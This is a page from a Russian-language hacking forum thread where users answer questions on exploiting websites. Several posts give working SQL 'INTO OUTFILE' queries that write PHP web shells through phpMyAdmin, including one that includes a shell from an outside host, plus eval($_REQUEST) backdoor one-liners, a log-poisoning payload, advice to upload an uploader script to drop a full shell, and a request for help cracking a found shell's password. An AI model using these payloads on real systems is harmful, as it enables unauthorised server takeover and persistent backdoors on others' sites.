ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 1290 из 1393 « Первая < 290790119012401280 1286 1287 1288 1289 1290 1291 1292 1293 1294 130013401390 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #12891  
Старый 04.05.2010, 00:23
Аватар для .:[melkiy]:.
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740

Репутация: 912
По умолчанию
Цитата:
Сообщение от GOGA075  
Такая ситуация:
Есть PhpMyAdin права полный Root
Делаю запрос вида
select '<? @include("http://site.ru/files/shell.txt"); ?>' into outfile 'D:/WWW/files/shell.php';
Создаеться файл .php, но когда захожу на него, там пустой белый лист!!!

А когда делаю запрос
select '<? phpinfo(); ?>' into outfile 'D:/WWW/files/info.php';
выводиться полный phpinfo!!

что может быть не так?

allow_url_include off скорее всего
 
Ответить с цитированием

  #12892  
Старый 04.05.2010, 00:24
Аватар для GOGA075
GOGA075
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744

Репутация: 18
По умолчанию
.:[melkiy]:.
Я с табой соглашусь!

Цитата:
Сообщение от [ DSU ]  
попробуй залить include($_GET[file]) ...
А по подробнее можно. А то я раньше таким не рользовался!
 
Ответить с цитированием

  #12893  
Старый 04.05.2010, 04:47
Аватар для попугай
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию
Цитата:
Сообщение от GOGA075  
.:[melkiy]:.
Я с табой соглашусь!



А по подробнее можно. А то я раньше таким не рользовался!

лучше eval($_GET['shell']);


Цитата:
Сообщение от BrainDeaD  
я извиняюсь, мой пост затерялся, поетому спрошу ещё раз.


с php вобще ничего не показывает.

возможно. как в этом случае можно глянуть какая функция используется.

там не инклюд, а читалка
 
Ответить с цитированием

  #12894  
Старый 04.05.2010, 04:59
Аватар для S00pY
S00pY
Познающий
Регистрация: 24.04.2007
Сообщений: 92
Провел на форуме:
2621544

Репутация: 412
Отправить сообщение для S00pY с помощью ICQ
По умолчанию
залить скрипт аплоада и через него лить уже обычный шелл

ЗЫ:Не трезв...
 
Ответить с цитированием

  #12895  
Старый 04.05.2010, 07:25
Аватар для GOGA075
GOGA075
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744

Репутация: 18
По умолчанию
попугай, eval($_GET['shell']); тоже ничего не дал. Ошибки только выдает! типа
Parse error: syntax error, unexpected '<' in D:\WWW\files\files.php(1) : assert code(1) : eval()'d code on line 1
 
Ответить с цитированием

  #12896  
Старый 04.05.2010, 08:29
Аватар для Twoster
Twoster
Reservists Of Antichat - Level 6
Регистрация: 20.08.2008
Сообщений: 328
Провел на форуме:
7144817

Репутация: 1503
По умолчанию
Цитата:
Сообщение от GOGA075  
попугай, eval($_GET['shell']); тоже ничего не дал. Ошибки только выдает! типа
Parse error: syntax error, unexpected '<' in D:\WWW\files\files.php(1) : assert code(1) : eval()'d code on line 1

Цитата:
select '<? eval(stripslashes($_REQUEST[\'var\'])); ?>' into outfile 'D:/WWW/files/shell.php';
Потом http://site.com/files/shell.php?var=phpinfo();
__________________

You may say I'm a dreamer
But I'm not the only one
Последний раз редактировалось Twoster; 04.05.2010 в 10:08..
 
Ответить с цитированием

  #12897  
Старый 04.05.2010, 09:23
Аватар для kfor
kfor
Участник форума
Регистрация: 01.09.2005
Сообщений: 194
Провел на форуме:
818095

Репутация: 34
Отправить сообщение для kfor с помощью ICQ
По умолчанию
Цитата:
Сообщение от shell_c0de  
<?php file_get_contents('http://site.ru/<?php eval(stripslashes($_REQUEST[cmd]));?>');?>
Спасибо большое. Но чё то или я туплю или даже хз, но в логах ngnix , но в логах чё то не появляется мой запрос
 
Ответить с цитированием

  #12898  
Старый 04.05.2010, 12:09
Аватар для mailbrush
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию
Код:
http://www.meningrey.net/%5c/
Что это за уязвимость такая? Где об этом можно почитать?
 
Ответить с цитированием

  #12899  
Старый 04.05.2010, 12:41
Аватар для LokbatanLi
LokbatanLi
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319

Репутация: -16
Отправить сообщение для LokbatanLi с помощью ICQ
По умолчанию
есть шелл с парольом..
как моjно наыти пароль ?
и пароль изменилось не стандартниы..
напримерь в wso парол root а здес что то друqое ..
как наыти ??
 
Ответить с цитированием

  #12900  
Старый 04.05.2010, 13:52
Аватар для попугай
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию
Цитата:
Сообщение от mailbrush  
Код:
http://www.meningrey.net/%5c/
Что это за уязвимость такая? Где об этом можно почитать?

читалка обычная походу.. и mod_rewrite обычный
 
Ответить с цитированием
Ответ
Страница 1290 из 1393 « Первая < 290790119012401280 1286 1287 1288 1289 1290 1291 1292 1293 1294 130013401390 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ